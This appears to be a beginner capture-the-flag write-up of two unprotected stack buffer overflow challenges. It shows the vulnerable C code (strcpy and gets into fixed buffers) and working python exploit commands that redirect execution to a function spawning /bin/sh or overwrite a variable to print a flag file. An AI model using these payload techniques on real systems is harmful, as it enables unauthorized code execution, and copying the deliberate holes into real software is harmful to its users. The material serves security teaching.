Easy - No Protections
Simple Buffer Overflow (no protection) - Function call
# Code
void copy_ordre(char *arg)
{
char ordre[50];
strcpy(ordre,arg);
printf("Ordre reçu : %s\n",ordre);
}
int main(int argc, char** argv) {
if(argc < 2) {
printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre.");
printf("Usage: %s <ordre>", argv[0]);
exit(0);
}
printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre.");
copy_ordre(argv[1]);
earth_destroy();
return 0;
}
void earth_destroy() {
printf("Mauvaise réponse ! Nous détruirons votre planète dans quelques minutes.");
}
void earth_alive() {
printf("Nous nous avouons vaincu. Vous avez gagné, nous vous rendons la terre !");
execve("/bin/sh", NULL, NULL);
}
# Explanations and Exploit
# The goal is to call earth_alive() function
# The buffer is 50 bytes long, so by submitting 50+ char, you can override what is after
# You have EIP, EBP and one argument (char) on the stack, so 12 bytes
# So, to override what you want and call the function, you will need to send 62 char before the payload
# The payload is the function adress you want to send
$ nm ./pwn1 | grep "earth_alive"
08048acb T earth_alive
# So, the payload will be the following
./pwn1 $(python -c 'print "A"*62 + "\xcb\x8a\x04\x08"')
Simple BoF - Int override
# Code
int main() {
char buf[20];
int x = 0;
gets(buf);
if (x == 1234) {
// gid_t gid = getegid();
// setresgid(gid, gid, gid);
FILE *fp;
fp = fopen("flag.txt", "r");
char flag[64];
fgets(flag, 64, (FILE*) fp);
printf("Oh, un flag : %s", flag);
}
printf("x value : %d", x);
return 0;
}
# Exploitation and Explanations
# You want to override the “x” value
# In the stack, 20 bytes are allowed to the buffer and 4 bytes are allowed to a pointer for this buffer.
# After that comes the value of x, so you can overflow here
$ python -c 'print "a"*24 + "\xd2\x04\x00\x00"' | ./pwn0
$ python -c 'print "a"*24 + "\xd2\x04"' | ./pwn0
$ python -c 'print "a"*22 + "\x00\x00\xd2\x04"' | ./pwn0
Last updated